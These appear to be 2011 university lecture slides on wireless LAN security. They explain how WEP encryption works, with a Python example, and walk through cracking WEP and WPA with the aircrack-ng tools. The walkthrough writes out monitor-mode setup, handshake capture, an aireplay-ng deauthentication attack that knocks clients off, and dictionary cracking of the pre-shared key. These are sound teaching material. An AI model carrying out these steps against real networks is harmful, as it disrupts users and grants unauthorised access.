WLAN Security: Cracking WEP/WPA
Assoc. Prof. Anan Phonphoem, Ph.D.
[email protected]
http://www.cpe.ku.ac.th/~anan
Computer Engineering Department, Kasetsart University, Bangkok, Thailand
Wireless LANs, 2011
WEP Block Diagram

[Figure: Encryption block, sender site. Inputs: Plain Text, Secret Key (40-bit or 128-bit), Initialization Vector (IV). The Integrity Algorithm (CRC-32) computes the Integrity Check Value (ICV) over the Plain Text. IV + Secret Key seed the Pseudo-Random Number Generator (RC-4), which outputs the Key Sequence. Bitwise XOR of (Plain Text, ICV) with the Key Sequence produces the Cipher Text; the IV is transmitted alongside it in clear.]

[Figure: Decryption block, receiver site. The IV taken from the received frame + Secret Key (40-bit or 128-bit) seed the Pseudo-Random Number Generator, reproducing the Key Sequence. Bitwise XOR of the Cipher Text with the Key Sequence yields the Plain Text and the received ICV. The Integrity Algorithm recomputes the ICV over the recovered Plain Text and compares it with the received ICV.]
WEP – Encoding

[Figure: the encryption block again. Plain Text -> Integrity Algorithm (CRC-32) -> ICV; Secret Key (40-bit or 128-bit) + Initialization Vector (IV) -> Pseudo-Random Number Generator (RC-4) -> Key Sequence; Bitwise XOR of (Plain Text, ICV) with the Key Sequence -> Cipher Text, sent together with the IV.]
WEP Frame

Field          Size       Protection
Frame Header              Clear Text
IV Header      4 bytes    Clear Text
Frame Body                Encrypted
ICV            4 bytes    Encrypted
Trailer FCS               Clear Text
WEP – Decryption

[Figure: the decryption block. IV from the frame + Secret Key (40-bit or 128-bit) -> Pseudo-Random Number Generator -> Key Sequence; Bitwise XOR of Cipher Text with the Key Sequence -> Plain Text and Integrity Check Value (ICV); Integrity Algorithm recomputes the ICV over the Plain Text for comparison.]
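As an added example (not part of the original slides), the two block diagrams above written out in Python: the RC-4 keystream seeded with IV || Secret Key, the CRC-32 ICV appended to the plaintext before the XOR, and the receiver recomputing the ICV after decryption. It assumes a 3-byte IV (the key-ID/pad byte of the 4-byte IV header is left out) and a 40-bit or 104-bit key; the key and IV values used at the bottom are constructed for illustration.

```python
import struct
import zlib

IV_LEN = 3    # WEP IV is 24 bits and travels in clear in the IV header
ICV_LEN = 4   # Integrity Check Value: CRC-32 over the plaintext


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """The 'Pseudo-Random Number Generator (RC-4)' box: KSA, then PRGA."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + seed[i % len(seed)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """Integrity Algorithm (CRC-32), little-endian as carried in the frame."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(plaintext: bytes, secret_key: bytes, iv: bytes) -> bytes:
    """Sender site: Key Sequence = RC4(IV || Secret Key); body = (Plain Text || ICV) XOR Key Sequence."""
    assert len(iv) == IV_LEN and len(secret_key) in (5, 13)   # 40-bit or 104-bit key
    key_sequence = rc4_keystream(iv + secret_key, len(plaintext) + ICV_LEN)
    body = bytes(a ^ b for a, b in zip(plaintext + icv(plaintext), key_sequence))
    return iv + body                           # IV prepended in clear


def wep_decrypt(frame: bytes, secret_key: bytes):
    """Receiver site: rebuild the Key Sequence from the clear IV, XOR, then verify the ICV.
    Returns the Plain Text, or None when the recomputed ICV does not match."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    key_sequence = rc4_keystream(iv + secret_key, len(body))
    decrypted = bytes(a ^ b for a, b in zip(body, key_sequence))
    plaintext, received_icv = decrypted[:-ICV_LEN], decrypted[-ICV_LEN:]
    return plaintext if icv(plaintext) == received_icv else None


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")          # constructed 40-bit key
    frame = wep_encrypt(b"hello, station 4", key, b"\x00\x00\x01")
    print(wep_decrypt(frame, key))             # b'hello, station 4'
    tampered = frame[:5] + bytes([frame[5] ^ 0x01]) + frame[6:]
    print(wep_decrypt(tampered, key))          # None: ICV mismatch
```

Note that the ICV is an unkeyed CRC rather than a message authentication code, and the 24-bit IV space is exhausted quickly on a busy network; both are reasons the WEP design shown here is broken by the tools in the following slides.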
Cracking WEP
Cracking Steps
1) Reconnaissance (collect target info.) [kismet]
2) Run promiscuous mode [iwconfig, airmon]
3) Collect data [airodump]
4) Crack key [aircrack]
Default SSIDs
1) Reconnaissance (Collect target info.)
Kismet (Reconnaissance)
Kismet (AP Info.)
Kismet (Client Info.)
2) Run promiscuous mode
[Figure: four stations (1, 2, 3, 4) on one wireless LAN.]
Regular Behavior
Station 1 transmits to all (broadcast)
[Figure: the same four stations; one station has its interface in promiscuous mode.]
Intention to Eavesdrop
Station 1 transmits to station 4; a station in promiscuous mode also receives the frame.
iwconfig
iwlist
Promiscuous Mode Setup
• By using iwconfig
• By using airmon-ng
3) Collect data
airodump (from Kismet)

Airodump problem:
root@APMoose:~/toulouse# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

/dev/rfkill is the Linux kernel subsystem for controlling radio transmitters (activated/deactivated).

anan@APMoose:~$ rfkill list
0: phy0: Wireless LAN
        Soft blocked: no      (soft block: software can reactivate)
        Hard blocked: no      (hard block: software cannot reactivate)
1: acer-wireless: Wireless LAN
        Soft blocked: no
        Hard blocked: no
2: acer-bluetooth: Bluetooth
        Soft blocked: no
        Hard blocked: no
4: hci0: Bluetooth
        Soft blocked: no
        Hard blocked: no

Solve by:
root@APMoose:~/toulouse# rfkill unblock all
airodump
airodump data files
4) Crack Key
aircrack
• For non-encryption
WEP Cracking Demo
Cracking WPA
Cracking Steps
1) Start the wireless interface in monitor mode on the specific AP channel
2) Start airodump-ng on the AP channel with a filter for the bssid to collect the authentication handshake
3) Use aireplay-ng to deauthenticate the wireless client
4) Run aircrack-ng to crack the pre-shared key using the authentication handshake
Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa
1) Start Monitoring Mode
Check interface
iwconfig
Start monitoring mode
2) Start airodump-ng (collect authentication handshake)
Start airodump-ng
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0

Parameter                   Description
-c 6                        Wireless channel
--bssid 00:1E:F7:xx:xx:xx   AP's MAC
-w psk                      File name prefix (the file contains the IVs)
mon0                        Interface name
Start airodump-ng with fewer parameters
Moose# airodump-ng -w psk mon0
3) Deauthenticate client
aireplay
Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0

Parameter               Description
-0                      deauthentication
1                       number of deauthentications sent
-a 00:12:01:xx:xx:xx    AP's MAC
-c 00:23:11:xx:xx:xx    MAC of the client being deauthenticated
mon0                    Interface name
4) Crack
Need a dictionary
Moose# aircrack-ng -b 00:12:01:xx:xx:xx psk*.cap
With dictionary
Moose# aircrack-ng -w password.lst psk*.cap
Handshake found
Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Successfully Cracked
Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa